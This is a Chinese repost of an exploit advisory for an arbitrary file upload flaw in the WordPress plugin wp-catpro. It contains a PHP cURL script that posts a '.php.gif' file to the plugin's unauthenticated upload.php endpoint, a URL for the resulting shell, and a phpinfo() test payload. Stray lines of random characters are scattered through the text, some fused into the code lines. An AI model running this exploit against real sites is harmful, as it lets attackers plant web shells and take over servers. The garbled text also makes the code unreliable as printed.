WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
. T6 l+ o( T0 [( S+ d" ~" _
作者  => Zikou-16
+ a; d* X* T9 w4 e9 s0 p- Q邮箱 => zikou16x@gmail.com
6 c9 W: v# ]+ i5 E- c$ a( X测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
0 r% r" ?* B4 a0 r####

; X% T+ T+ z! C7 |' c#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
$ [. }* ~, m  ~) f# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
3 }+ |, N5 U0 |* O' E/ j7 A------------------
" {, }0 _0 f- t; `8 {' S
#=> Exploit
-----------
9 n* G# B! E. z$ r<?php

$uploadfile="zik.php.gif";
5 {# [4 c+ o6 e, B5 P+ N' ^0 {9 H$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
9 o* ]1 |& e  I8 q% B: {8 [3 ucurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
1 d: t" ~1 `6 F; M1 A, Y$ J'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

; v7 c7 E) \; \4 F! @2 lprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
5 a& E% |' K( r3 ]/ `  ?>
<?php
7 _* V+ d- B! w9 g9 dphpinfo();
  Z  n; c* }1 b?>